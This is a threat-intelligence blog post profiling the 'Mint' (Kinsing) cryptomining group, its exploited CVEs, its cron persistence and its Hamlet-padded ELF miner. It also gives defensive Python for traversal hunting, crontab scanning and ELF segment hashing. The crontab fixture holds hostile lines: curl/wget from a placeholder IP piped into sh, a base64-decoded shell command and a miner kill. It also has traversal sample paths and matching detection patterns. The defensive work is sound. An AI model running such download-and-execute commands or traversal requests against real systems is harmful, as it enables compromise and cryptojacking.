Before diving into this first activity cluster, be sure to read the series introduction here.
And continue with the rest of the series by clicking the links below:
- Cluster 2: Mint Sprinkles
- Cluster 3: Strawberry
- Cluster 4: Strawberry Sprinkles
- Cluster 5: Pistachio
Our first activity cluster is known as Mint.
Mint is a flavor of attacker that uses remote code execution (RCE) exploits against Internet-facing Linux systems to install cryptocurrency miners on them.
Mint's actions had been observed previously, but we first started paying close attention to them as a threat group at the beginning of January 2020, when they began a campaign exploiting CVE-2019-19781, a vulnerability in the Citrix Application Delivery Controller (ADC) and Citrix Gateway. It allowed an attacker to execute code remotely without any prerequisite such as authentication to the system.
Unauthenticated RCE is among the most serious classes of vulnerability: it hands an attacker control of the system in seconds, with no credentials or prior foothold required.
The vulnerability was on the radar of Alert Logic researchers and threat hunters from the moment it was announced on December 17, 2019. Wideband telemetry signatures were deployed immediately and flagged as candidates for hunts. Like all wideband hunting telemetry, they captured a large amount of benign traffic, because the net is deliberately cast wide. These signatures captured full network payloads, so our SOC threat experts (TSX) could sift through the requests and responses sent to and from the Citrix devices. This creates a feedback loop in which what the hunters see is used to refine the telemetry signatures.
Initial reviews of this telemetry yielded nothing. It was only after January 10, 2020, when a PoC became publicly available, that we started to see our customers being targeted with the exploit. This is a common pattern: attackers and defenders may both know that a vulnerability exists, but at first very few know the specific method needed to exploit it.
Once a PoC is public, however, malicious actors reuse its request string and create derivatives of it, both to exploit the flaw and to evade detection or prevention controls written against the original.
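Derivatives of a PoC usually vary the encoding or spelling of the request rather than its logic, so a hunting signature should match on the request after normalisation rather than on the literal PoC string. The following is an added example, not Alert Logic's signature or telemetry code: it percent-decodes and canonicalises a request path and flags any request that reaches the /vpns/ directory by way of path traversal, which is the publicly documented shape of CVE-2019-19781 exploitation. The sample request paths are constructed for illustration and are not captured telemetry.

```python
import posixpath
from urllib.parse import unquote, urlsplit

# Constructed request paths for illustration; they are not captured telemetry.
SAMPLE_REQUESTS = [
    "/vpn/index.html",                                  # benign portal page
    "/vpn/../vpn/index.html",                           # traversal that stays inside /vpn
    "/vpn/../vpns/cfg/smb.conf",                        # plain PoC-style traversal
    "/vpn/%2e%2e/vpns/portal/scripts/newbm.pl",         # single-encoded dots
    "/vpn/%252e%252e/vpns/portal/scripts/newbm.pl",     # double-encoded dots
    "/vpn/..%2F..%2Fvpns/portal/scripts/newbm.pl",      # encoded slashes
    "/vpn/./../vpns/portal/scripts/newbm.pl?x=1",       # dot segment plus query string
]


def normalize_path(raw: str, max_decode_rounds: int = 3) -> str:
    """Percent-decode until stable (bounded, so double encoding is handled),
    then collapse '.' and '..' segments the way a file system would."""
    path = urlsplit(raw).path or "/"
    for _ in range(max_decode_rounds):
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    path = path.replace("\\", "/")
    norm = posixpath.normpath(path)
    if not norm.startswith("/"):
        norm = "/" + norm
    return norm.lower()


def reaches_vpns_by_traversal(raw: str) -> bool:
    """True when the literal request does not start with /vpns/ but the
    canonical path does, i.e. the requester traversed into it."""
    literal = urlsplit(raw).path.lower()
    canonical = normalize_path(raw)
    reaches = canonical == "/vpns" or canonical.startswith("/vpns/")
    return reaches and not literal.startswith("/vpns")


def flag_requests(paths):
    """Return the subset of request paths that should be pulled for a hunt."""
    return [p for p in paths if reaches_vpns_by_traversal(p)]


if __name__ == "__main__":
    for p in SAMPLE_REQUESTS:
        mark = "FLAG " if reaches_vpns_by_traversal(p) else "     "
        print(f"{mark}{p} -> {normalize_path(p)}")
```

The decode loop is bounded on purpose: an unbounded "decode until stable" loop is itself a denial-of-service lever, and three rounds already covers double encoding, which is as deep as real derivatives tend to go.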
The Mint flavor was first confirmed when an Alert Logic threat hunter identified a malware dropper whose name referenced the Citrix RCE and followed a two-character "XX.sh" naming formula. The infected machine was verified to be a Citrix ADC. The dropper killed any miners already present, set up persistence via cron jobs, and then dropped an Executable and Linkable Format (ELF) binary that began mining cryptocurrency (an XMRig miner).
We observed similar activity in April 2020 as part of the SaltStack campaign, although an interesting new tactic appeared once access had been gained through the SaltStack RCE.
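The dropper behaviour described above (kill competing miners, persist through cron, fetch and run a payload) leaves a footprint in crontabs that is worth hunting for regardless of which RCE was used for entry. The following is an added example, not Alert Logic's detection content: it parses crontab text and flags entries matching generic download-and-execute, decode-and-execute, world-writable-path and process-killing patterns. The crontab it scans is constructed for the example and contains no real indicators.

```python
import re

# Constructed crontab, written for this example; it is not a recovered artefact.
SAMPLE_CRONTAB = """\
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
# nightly certificate renewal
0 2 * * * /usr/bin/certbot renew --quiet
*/5 * * * * /usr/local/bin/backup.sh >> /var/log/backup.log 2>&1
* * * * * (curl -fsSL http://203.0.113.10/x.sh || wget -q -O- http://203.0.113.10/x.sh) | sh
@reboot /tmp/.x/run >/dev/null 2>&1
* * * * * pkill -f xmrig; echo ZWNobyBoaQ== | base64 -d | sh
"""

# Each indicator is (compiled regex, description). Any match marks the job.
INDICATORS = [
    (re.compile(r"\b(curl|wget)\b.*\|\s*(ba|da|z)?sh\b"), "download piped into a shell"),
    (re.compile(r"\bbase64\s+(-d|--decode)\b"), "base64-decoded command"),
    (re.compile(r"(^|[\s(;|&])(/tmp|/var/tmp|/dev/shm)/\S*"), "runs from a world-writable directory"),
    (re.compile(r"\b(pkill|killall)\b"), "kills other processes (miner competition)"),
]
# Reported as context only; an every-minute schedule never flags on its own.
EVERY_MINUTE = re.compile(r"^\*\s+\*\s+\*\s+\*\s+\*$")


def parse_crontab(text):
    """Yield (line_no, schedule, command) for each job line, skipping
    comments, blank lines and VAR=value assignments (user crontab format)."""
    for n, line in enumerate(text.splitlines(), 1):
        s = line.strip()
        if not s or s.startswith("#") or re.match(r"^[A-Za-z_][A-Za-z0-9_]*=", s):
            continue
        if s.startswith("@"):                      # @reboot, @daily, ...
            fields = s.split(None, 1)
        else:                                      # five time fields then command
            fields = s.split(None, 5)
            if len(fields) < 6:
                continue
            fields = [" ".join(fields[:5]), fields[5]]
        if len(fields) != 2:
            continue
        yield n, fields[0], fields[1]


def find_suspicious_jobs(text):
    """Return [(line_no, command, [reasons])] for jobs matching any indicator."""
    findings = []
    for n, schedule, command in parse_crontab(text):
        reasons = [why for rx, why in INDICATORS if rx.search(command)]
        if reasons:
            if EVERY_MINUTE.match(schedule):
                reasons.append("runs every minute")
            findings.append((n, command, reasons))
    return findings


if __name__ == "__main__":
    for n, command, reasons in find_suspicious_jobs(SAMPLE_CRONTAB):
        print(f"line {n}: {command}\n    {', '.join(reasons)}")
```

In practice run this over every user's crontab (`crontab -l -u <user>`), /etc/crontab and /etc/cron.d/*; the latter two carry an extra user field after the schedule, so extend the parser before pointing it at them.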
Mint TTP Evolution
Attackers evolve as they attempt to evade security controls, and this time the ELF contained the whole of Shakespeare's Hamlet amongst the code. Fun as that is, the tragedy most likely served as padding: analytical tools would see the file as mostly benign, since the majority of it was non-executable text, and tools that flag or block based on the percentage of malicious content identified would not be confident enough to block the file. Given that goal, it is no wonder they chose Shakespeare's longest play.
“Though this be madness, yet there is method in’t.”
– Hamlet Act 2, Scene 2, 193-206
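The padding trick defeats any scoring that treats the file as an undifferentiated byte stream, because a couple of hundred kilobytes of prose can dilute whatever ratio you compute over the whole file. The added example below is my own illustration, not Alert Logic tooling and not the Kinsing binary: it builds a minimal ELF64 twice, once bare and once with a repeated Hamlet excerpt in a read-only segment, and contrasts a whole-file printable-text ratio with a measure that walks the program headers and looks only at executable segments. The latter, including a hash over those segments, is unchanged by the padding. The exit stub and the excerpt are constructed for the example.

```python
import hashlib
import struct

ELF_BASE = 0x400000            # load address used by the builder below
PT_LOAD, PF_X, PF_R = 1, 1, 4

# x86-64 machine code for exit(0): mov eax,60 ; xor edi,edi ; syscall
EXIT_STUB = bytes.fromhex("b83c000000" "31ff" "0f05")

# Constructed padding: a short Hamlet excerpt, repeated to stand in for the play.
HAMLET_EXCERPT = (
    b"Though this be madness, yet there is method in't.\n"
    b"Will you walk out of the air, my lord?\n"
    b"Into my grave.\n"
)


def build_elf(code: bytes, rodata: bytes = b"") -> bytes:
    """Build a minimal static ELF64 (x86-64) with one R+X segment holding
    `code` and, if given, a second read-only segment holding `rodata`."""
    phnum = 2 if rodata else 1
    code_off = 64 + 56 * phnum
    data_off = code_off + len(code)
    ehdr = struct.pack(
        "<16sHHIQQQIHHHHHH",
        b"\x7fELF" + bytes([2, 1, 1, 0]) + bytes(8),  # 64-bit, little-endian, SysV
        2, 0x3E, 1,                                     # ET_EXEC, x86-64, version 1
        ELF_BASE + code_off,                            # e_entry
        64, 0, 0,                                       # e_phoff, e_shoff, e_flags
        64, 56, phnum, 64, 0, 0,                        # header sizes and counts
    )
    phdrs = struct.pack("<IIQQQQQQ", PT_LOAD, PF_R | PF_X, code_off,
                        ELF_BASE + code_off, ELF_BASE + code_off,
                        len(code), len(code), 0x1000)
    if rodata:
        phdrs += struct.pack("<IIQQQQQQ", PT_LOAD, PF_R, data_off,
                             ELF_BASE + data_off, ELF_BASE + data_off,
                             len(rodata), len(rodata), 0x1000)
    return ehdr + phdrs + code + rodata


def printable_ratio(data: bytes) -> float:
    """Naive file-level heuristic: share of bytes that are printable ASCII."""
    printable = sum(1 for b in data if 0x20 <= b <= 0x7E or b in (0x09, 0x0A, 0x0D))
    return printable / len(data)


def executable_segments(data: bytes):
    """Yield the file bytes of every PT_LOAD segment marked executable."""
    if data[:4] != b"\x7fELF" or data[4] != 2 or data[5] != 1:
        raise ValueError("not a little-endian ELF64 file")
    (_, _, _, _, phoff, _, _, _, phentsize, phnum, _, _, _) = struct.unpack_from(
        "<HHIQQQIHHHHHH", data, 16)
    for i in range(phnum):
        p_type, p_flags, p_offset, _, _, p_filesz, _, _ = struct.unpack_from(
            "<IIQQQQQQ", data, phoff + i * phentsize)
        if p_type == PT_LOAD and p_flags & PF_X:
            # Clamp to the file so a lying header cannot make us read past the end.
            yield data[p_offset:p_offset + min(p_filesz, len(data) - p_offset)]


def executable_bytes(data: bytes) -> int:
    return sum(len(seg) for seg in executable_segments(data))


def executable_digest(data: bytes) -> str:
    """SHA-256 over executable segments only; padding elsewhere cannot change it."""
    h = hashlib.sha256()
    for seg in executable_segments(data):
        h.update(seg)
    return h.hexdigest()


if __name__ == "__main__":
    plain = build_elf(EXIT_STUB)
    padded = build_elf(EXIT_STUB, HAMLET_EXCERPT * 50)
    for name, f in (("plain", plain), ("padded", padded)):
        print(f"{name:7s} size={len(f):6d} printable={printable_ratio(f):.2f} "
              f"exec_bytes={executable_bytes(f)} exec_sha256={executable_digest(f)[:16]}")
```

The same idea applies to entropy, string density and YARA-style scoring: compute them per segment (or per section, when the section table has not been stripped) rather than per file, and key detections on the executable segment's digest so that a miner padded with a different play still matches.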
The tactical evolution became part of the Mint strategy. It was observed again in October 2020 when the Oracle WebLogic RCE was discovered, and again in August 2021, exploiting the Atlassian Confluence flaw.
The activity we have observed involves Russian IP addresses throughout, with IP addresses associated with former Soviet states appearing in the installation phases. While this is useful for tracking and hunting activity related to this flavor, it is important to stress that it is not attribution to a nation: attackers routinely rent, proxy through or compromise hosts in whichever country suits them, so a source address tells you about the infrastructure, not about the operator.
Their overall objective has been to install crypto miners on vulnerable systems, hijacking their compute power to provide a steady stream of cryptocurrency to the attackers' wallets. We have referred to the ELF file internally as the GO-LNG Miner; in the wider security community it is known as Kinsing.
Mint continues to look for the latest RCE vulnerability to gain initial access. More recently, at the end of 2021 and into 2022, this flavor was very active during the Log4j saga, attempting to capitalize on the abundance of Java-based applications likely to have bundled the vulnerable open-source logging library.
Although Mint jumps on the latest exploit in the hope of catching vulnerable systems before the next patch cycle, and has shown it can adapt its TTPs when necessary, the techniques and actions that follow initial access are consistent. The same two mining configurations have been observed every time, alongside other common methods and indicators in the C2 and installation phases, which allows us to confidently cluster the activity under the flavor Mint.
Our understanding and routine tracking of this threat activity has facilitated numerous detections and remediation plans for this group in our customer base.
Known Exploits Used
- Kubernetes misconfigurations
- CVE-2017-9841 – PHPUnit eval-stdin.php RCE
- CVE-2019-9082 – ThinkPHP RCE
- CVE-2019-19781 – Citrix ADC/Gateway RCE
- CVE-2020-11651 – SaltStack authentication bypass
- CVE-2020-7961 – Liferay Portal RCE
- CVE-2020-5902 – F5 BIG-IP TMUI RCE
- CVE-2020-15505 – MobileIron Core & Connector RCE
- CVE-2020-14882 / CVE-2020-14750 – Oracle WebLogic RCE
- CVE-2020-11854 – Micro Focus
- CVE-2021-3129 – Laravel Ignition RCE
- CVE-2021-26084 – Atlassian Confluence RCE
- CVE-2021-41773 – Apache HTTP Server path traversal / RCE
Techniques Used (MITRE ATT&CK)
- Active Scanning – T1595 [reconnaissance]
- Exploit Public-Facing Application – T1190 [reconnaissance / delivery / exploitation]
- Scheduled Task/Job: Cron – T1053.003 [installation / persistence]
- Ingress Tool Transfer – T1105 [installation / C2]
- Application Layer Protocol – T1071 [C2]
- Resource Hijacking – T1496 [actions on objectives]
Targeting
- Vulnerable and exposed servers
- Linux servers
- Indiscriminate of business sector
Infrastructure
- Russian ASOs used throughout
- Ex-Soviet state ASOs used during the installation phase
Actions on Objectives
- Crypto mining (XMRIG)